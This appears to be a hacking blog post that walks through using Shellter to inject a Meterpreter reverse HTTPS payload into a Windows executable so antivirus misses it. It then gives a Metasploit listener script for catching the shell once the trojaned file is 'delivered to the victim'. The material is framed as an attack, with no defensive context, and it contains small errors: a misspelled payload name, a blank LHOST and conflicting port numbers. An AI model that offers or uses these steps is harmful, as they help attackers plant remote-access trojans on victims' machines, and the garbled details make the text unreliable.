--> Bypassing antivirus programs using SHELLTER | My Hack Stuff

Bypassing antivirus programs using SHELLTER

Shellter is another antivirus evasion tool like veil-evasion framework, which infects the PE dynamically, can be used to inject the shell code into any 32-bit native Windows application. This framework enable us to either customize the payload or utilize the Metasploit framework in a sophisticated way. Most antivirus programs will not be able to identify the malicious executable, depending upon how the attackers re-encode endless number of signatures.

Shellter can be installed by running apt-get install shellter in the terminal of Kali Linux if you are not logged in as root user then use sudo apt-get install shellter. Once the application is installed, we can open Shellter by issuing shellter command in the terminal.
Now our objective is to create malicious executable file explained below in 7 steps:

  • Attackers should be given the option to select either Auto (A) or Manual (M) and help (H). I am going to use Auto mode.

  • Our 2nd step is to provide the PE target file; attackers can choose any exe file or utilize the executables in /usr/share/windows-binaries/.

  • AfterPE target file location is provided, Shellter will be able to disassemble the PE file.

  • In the end, Shellter will ask you to enable the stealth mode or not.

  • Post stealth mode selection, you will be able to inject the listed payloads to the same PE file.

  • I prefer meterpreter_reverse_HTTPS then provide the LHOST and LPORT.

  • Everything is fine all info is fed to Shellter, and the same PE file provided as input is now injected with the payload and the injection is complete.

After creation of file you can scan with any antivirus program to verify. Once this executable is delivered to the victim, sender will now be able to open up the listener as per the payload; in my example, LHOST is and LPORT is 5244:

use exploit/multi/handler
set payload windows/meterpretere/reverse_HTTPS
set lhost
set lport 5544
set exitonsession false
exploit -j -z

To easily provoke the above commands you can save the preceding list of commands to a filename as listener.rc and run using Metasploit by running (msfconsole -r listener.rc). Once the victim opens the executable without being blocked by the antivirus or any security controls, it should open the tunnel to the attacker's IP without any trouble. :)

Thanks for reading now let me recommend you some other practical guides about penetration testing of Remote Access Protocols, Remote Desktop ProtocolSSH Network Protocol, Network RoutersWordpress website using WPSeku,



AC Milan,14,Arsenal,15,Atalanta,15,Atletico Madrid,15,Barcelona,25,Bayern München,17,Bundesliga,63,Business,1,Chelsea,22,Coronavirus,2,Cristiano Ronaldo,20,Dortmund,11,Ethical Hacking,46,Exploitation,35,FA Cup,2,Featured,559,Football,572,Footprinting,29,Google Adsense,2,Inter Milan,19,Juventus,23,Kali Linux,39,Kali NetHunter,3,LaLiga,102,Lazio,13,Leicester City,12,Ligue 1,68,Live Streams,12,Liverpool,21,Lyon,8,Make Money,3,Manchester City,29,Manchester United,23,Messi,9,Metasploit,1,Napoli,12,Offensive Security,17,Penetration Testing,15,Politics,2,Post Exploitation,19,Premier League,119,PSG,13,Real Madrid,27,Roma,8,Search Engine Optimization,4,Serie A,88,Sevilla,9,Sports,543,Technology,36,Tips,16,Tottenham Hotspur,15,Trending,787,UEFA Champions League,74,UEFA Europa League,14,UEFA Nations League,3,United States,1,Windows,7,World News,7,
My Hack Stuff: Bypassing antivirus programs using SHELLTER
Bypassing antivirus programs using SHELLTER
My Hack Stuff
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content